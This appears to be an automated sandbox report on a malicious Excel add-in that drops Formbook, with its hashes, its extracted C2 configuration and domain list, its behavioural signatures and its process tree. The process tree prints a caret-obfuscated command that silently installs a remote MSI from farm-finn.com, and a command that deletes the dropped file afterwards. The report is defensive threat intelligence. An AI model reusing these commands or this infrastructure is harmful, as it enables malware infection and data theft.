Analysis
-
max time kernel
148s -
max time network
142s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
06-05-2021 14:25
Static task
static1
Behavioral task
behavioral1
Sample
14.xlam
Resource
win7v20210408
General
-
Target
14.xlam
-
Size
15KB
-
MD5
11e9376ee19889ee5c08e816b1d3b231
-
SHA1
d22b56bedc58de7da73d647a5f3048b9cabc17d7
-
SHA256
cfee90218720f31491495dd353027017808fb3b9524d6c86ddfd016a372f627c
-
SHA512
fe846e63b1616166bebed98bdea82f1d141a23a0abc68cf6dc94216f9b0242859dcebd5471aa0943a46a5ecfca1e430badaf049db4469ec3a13a252b2eb8164b
Malware Config
Extracted
formbook
4.1
http://www.111bjs.com/ccr/
abdullahlodhi.com
jevya.com
knoxvillerestaurant.com
mekarauroko7389.com
cricketspowder.net
johannchirinos.com
orangeorganical.com
libero-tt.com
lorenaegianluca.com
wintab.net
modernmillievintage.com
zgdqcyw.com
jeffabildgaardmd.com
nurulfikrimakassar.com
findyourchef.com
innovationsservicegroup.com
destek-taleplerimiz.com
whfqqco.icu
kosmetikmadeingermany.com
dieteticos.net
savarsineklik.com
newfashiontrends.com
e-mobilitysolutions.com
spaced.ltd
amjadalitrading.com
thejstutor.com
zzhqp.com
exoticomistico.com
oklahomasundayschool.com
grwfrog.com
elementsfitnessamdwellbeing.com
auldontoyworld.com
cumhuriyetcidemokratparti.kim
thetruthinternational.com
adimadimingilizce.com
retreatwinds.com
duoteshop.com
jasonkokrak.com
latindancextreme.com
agavedeals.com
motz.xyz
kspecialaroma.com
yuejinjc.com
print12580.com
ampsports.tennis
affordablebathroomsarizona.com
casnop.com
driftwestcoastmarket.com
bjsjygg.com
gwpjamshedpur.com
reserveacalifornia.com
caobv.com
culturaenmistacones.com
back-upstore.com
jjsmiths.com
iamxc.com
siobhankrittiya.com
digitalakanksha.com
koatku.com
shamushalkowich.com
merplerps.com
fishexpertise.com
sweetheartmart.com
nqs.xyz
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2656 4084 cmd.exe EXCEL.EXE -
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4128-188-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral2/memory/4128-190-0x0000000000560000-0x00000000006AA000-memory.dmp formbook behavioral2/memory/4216-198-0x00000000030E0000-0x000000000310E000-memory.dmp formbook -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 16 2608 msiexec.exe -
Executes dropped EXE 2 IoCs
Processes:
MSI47A1.tmpMSI47A1.tmppid process 2228 MSI47A1.tmp 4128 MSI47A1.tmp -
Loads dropped DLL 1 IoCs
Processes:
MSI47A1.tmppid process 2228 MSI47A1.tmp -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 2440 msiexec.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
MSI47A1.tmpMSI47A1.tmpipconfig.exedescription pid process target process PID 2228 set thread context of 4128 2228 MSI47A1.tmp MSI47A1.tmp PID 4128 set thread context of 3008 4128 MSI47A1.tmp Explorer.EXE PID 4128 set thread context of 3008 4128 MSI47A1.tmp Explorer.EXE PID 4216 set thread context of 3008 4216 ipconfig.exe Explorer.EXE -
Drops file in Windows directory 6 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI4676.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI47A1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI424E.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
Processes:
resource yara_rule C:\Windows\Installer\MSI47A1.tmp nsis_installer_1 C:\Windows\Installer\MSI47A1.tmp nsis_installer_2 C:\Windows\Installer\MSI47A1.tmp nsis_installer_1 C:\Windows\Installer\MSI47A1.tmp nsis_installer_2 C:\Windows\Installer\MSI47A1.tmp nsis_installer_1 C:\Windows\Installer\MSI47A1.tmp nsis_installer_2 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 4216 ipconfig.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4084 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 58 IoCs
Processes:
msiexec.exeMSI47A1.tmpipconfig.exepid process 2608 msiexec.exe 2608 msiexec.exe 4128 MSI47A1.tmp 4128 MSI47A1.tmp 4128 MSI47A1.tmp 4128 MSI47A1.tmp 4128 MSI47A1.tmp 4128 MSI47A1.tmp 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe 4216 ipconfig.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3008 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
MSI47A1.tmpMSI47A1.tmpipconfig.exepid process 2228 MSI47A1.tmp 4128 MSI47A1.tmp 4128 MSI47A1.tmp 4128 MSI47A1.tmp 4128 MSI47A1.tmp 4216 ipconfig.exe 4216 ipconfig.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exeMSI47A1.tmpipconfig.exeExplorer.EXEdescription pid process Token: SeShutdownPrivilege 2440 msiexec.exe Token: SeIncreaseQuotaPrivilege 2440 msiexec.exe Token: SeSecurityPrivilege 2608 msiexec.exe Token: SeCreateTokenPrivilege 2440 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2440 msiexec.exe Token: SeLockMemoryPrivilege 2440 msiexec.exe Token: SeIncreaseQuotaPrivilege 2440 msiexec.exe Token: SeMachineAccountPrivilege 2440 msiexec.exe Token: SeTcbPrivilege 2440 msiexec.exe Token: SeSecurityPrivilege 2440 msiexec.exe Token: SeTakeOwnershipPrivilege 2440 msiexec.exe Token: SeLoadDriverPrivilege 2440 msiexec.exe Token: SeSystemProfilePrivilege 2440 msiexec.exe Token: SeSystemtimePrivilege 2440 msiexec.exe Token: SeProfSingleProcessPrivilege 2440 msiexec.exe Token: SeIncBasePriorityPrivilege 2440 msiexec.exe Token: SeCreatePagefilePrivilege 2440 msiexec.exe Token: SeCreatePermanentPrivilege 2440 msiexec.exe Token: SeBackupPrivilege 2440 msiexec.exe Token: SeRestorePrivilege 2440 msiexec.exe Token: SeShutdownPrivilege 2440 msiexec.exe Token: SeDebugPrivilege 2440 msiexec.exe Token: SeAuditPrivilege 2440 msiexec.exe Token: SeSystemEnvironmentPrivilege 2440 msiexec.exe Token: SeChangeNotifyPrivilege 2440 msiexec.exe Token: SeRemoteShutdownPrivilege 2440 msiexec.exe Token: SeUndockPrivilege 2440 msiexec.exe Token: SeSyncAgentPrivilege 2440 msiexec.exe Token: SeEnableDelegationPrivilege 2440 msiexec.exe Token: SeManageVolumePrivilege 2440 msiexec.exe Token: SeImpersonatePrivilege 2440 msiexec.exe Token: SeCreateGlobalPrivilege 2440 msiexec.exe Token: SeRestorePrivilege 2608 msiexec.exe Token: SeTakeOwnershipPrivilege 2608 msiexec.exe Token: SeRestorePrivilege 2608 msiexec.exe Token: SeTakeOwnershipPrivilege 2608 msiexec.exe Token: SeRestorePrivilege 2608 msiexec.exe Token: SeTakeOwnershipPrivilege 2608 msiexec.exe Token: SeRestorePrivilege 2608 msiexec.exe Token: SeTakeOwnershipPrivilege 2608 msiexec.exe Token: SeRestorePrivilege 2608 msiexec.exe Token: SeTakeOwnershipPrivilege 2608 msiexec.exe Token: SeRestorePrivilege 2608 msiexec.exe Token: SeTakeOwnershipPrivilege 2608 msiexec.exe Token: SeDebugPrivilege 4128 MSI47A1.tmp Token: SeDebugPrivilege 4216 ipconfig.exe Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
EXCEL.EXEpid process 4084 EXCEL.EXE 4084 EXCEL.EXE 4084 EXCEL.EXE 4084 EXCEL.EXE 4084 EXCEL.EXE 4084 EXCEL.EXE 4084 EXCEL.EXE 4084 EXCEL.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3008 Explorer.EXE -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
EXCEL.EXEcmd.exemsiexec.exeMSI47A1.tmpExplorer.EXEipconfig.exedescription pid process target process PID 4084 wrote to memory of 2656 4084 EXCEL.EXE cmd.exe PID 4084 wrote to memory of 2656 4084 EXCEL.EXE cmd.exe PID 2656 wrote to memory of 2440 2656 cmd.exe msiexec.exe PID 2656 wrote to memory of 2440 2656 cmd.exe msiexec.exe PID 2608 wrote to memory of 2228 2608 msiexec.exe MSI47A1.tmp PID 2608 wrote to memory of 2228 2608 msiexec.exe MSI47A1.tmp PID 2608 wrote to memory of 2228 2608 msiexec.exe MSI47A1.tmp PID 2228 wrote to memory of 4128 2228 MSI47A1.tmp MSI47A1.tmp PID 2228 wrote to memory of 4128 2228 MSI47A1.tmp MSI47A1.tmp PID 2228 wrote to memory of 4128 2228 MSI47A1.tmp MSI47A1.tmp PID 2228 wrote to memory of 4128 2228 MSI47A1.tmp MSI47A1.tmp PID 3008 wrote to memory of 4216 3008 Explorer.EXE ipconfig.exe PID 3008 wrote to memory of 4216 3008 Explorer.EXE ipconfig.exe PID 3008 wrote to memory of 4216 3008 Explorer.EXE ipconfig.exe PID 4216 wrote to memory of 4260 4216 ipconfig.exe cmd.exe PID 4216 wrote to memory of 4260 4216 ipconfig.exe cmd.exe PID 4216 wrote to memory of 4260 4216 ipconfig.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\14.xlam"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/4409212.msi /qn3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msiexec.exemSiExec /i http://farm-finn.com/admin/4409212.msi /qn4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\SysWOW64\ipconfig.exe"2⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Installer\MSI47A1.tmp"3⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSI47A1.tmp"C:\Windows\Installer\MSI47A1.tmp"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSI47A1.tmp"C:\Windows\Installer\MSI47A1.tmp"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-msMD5
4fcb2a3ee025e4a10d21e1b154873fe2
SHA157658e2fa594b7d0b99d02e041d0f3418e58856b
SHA25690bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA5124e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
-
C:\Windows\Installer\MSI47A1.tmpMD5
d8a19f13154e81e9d526077422655453
SHA1573e6aed1534203b36f9a8e5121c125b02e11b0f
SHA256b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853
SHA512193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae
-
C:\Windows\Installer\MSI47A1.tmpMD5
d8a19f13154e81e9d526077422655453
SHA1573e6aed1534203b36f9a8e5121c125b02e11b0f
SHA256b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853
SHA512193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae
-
C:\Windows\Installer\MSI47A1.tmpMD5
d8a19f13154e81e9d526077422655453
SHA1573e6aed1534203b36f9a8e5121c125b02e11b0f
SHA256b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853
SHA512193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae
-
\Users\Admin\AppData\Local\Temp\nsq4973.tmp\3dd73lht.dllMD5
df8beafa8d4250032a73e261c80e35e3
SHA13ced0abd9f02d24d79ede5052f661108b01df997
SHA256a57717b0b91bb128761a4363d12cacd45431c7e512d5a8d307b40cf30e6a26da
SHA512bf9fd7009e3c4919b2b230748c8f3795423b4e7e57d82d531a31682916dfb589c2df2b20320a51b532e21dec98ce597a4a80589ec5fa442417274661e1c9d1ce
-
memory/2228-181-0x0000000000000000-mapping.dmp
-
memory/2228-187-0x00000000027C0000-0x00000000027E3000-memory.dmpFilesize
140KB
-
memory/2440-180-0x0000000000000000-mapping.dmp
-
memory/2656-179-0x0000000000000000-mapping.dmp
-
memory/3008-191-0x00000000062E0000-0x0000000006487000-memory.dmpFilesize
1.7MB
-
memory/3008-193-0x0000000006E00000-0x0000000006F65000-memory.dmpFilesize
1.4MB
-
memory/3008-201-0x00000000053A0000-0x00000000054E5000-memory.dmpFilesize
1.3MB
-
memory/4084-118-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmpFilesize
64KB
-
memory/4084-117-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmpFilesize
64KB
-
memory/4084-114-0x00007FF7F5450000-0x00007FF7F8A06000-memory.dmpFilesize
53.7MB
-
memory/4084-116-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmpFilesize
64KB
-
memory/4084-122-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmpFilesize
64KB
-
memory/4084-121-0x00007FFBAEA40000-0x00007FFBAFB2E000-memory.dmpFilesize
16.9MB
-
memory/4084-115-0x00007FFB8DE80000-0x00007FFB8DE90000-memory.dmpFilesize
64KB
-
memory/4084-123-0x00000275804B0000-0x00000275823A5000-memory.dmpFilesize
31.0MB
-
memory/4128-185-0x000000000041EBB0-mapping.dmp
-
memory/4128-192-0x0000000000930000-0x0000000000944000-memory.dmpFilesize
80KB
-
memory/4128-190-0x0000000000560000-0x00000000006AA000-memory.dmpFilesize
1.3MB
-
memory/4128-189-0x0000000000A40000-0x0000000000D60000-memory.dmpFilesize
3.1MB
-
memory/4128-188-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/4216-195-0x0000000000000000-mapping.dmp
-
memory/4216-198-0x00000000030E0000-0x000000000310E000-memory.dmpFilesize
184KB
-
memory/4216-197-0x00000000010D0000-0x00000000010DB000-memory.dmpFilesize
44KB
-
memory/4216-199-0x00000000032B0000-0x00000000035D0000-memory.dmpFilesize
3.1MB
-
memory/4216-200-0x0000000003670000-0x0000000003703000-memory.dmpFilesize
588KB
-
memory/4260-196-0x0000000000000000-mapping.dmp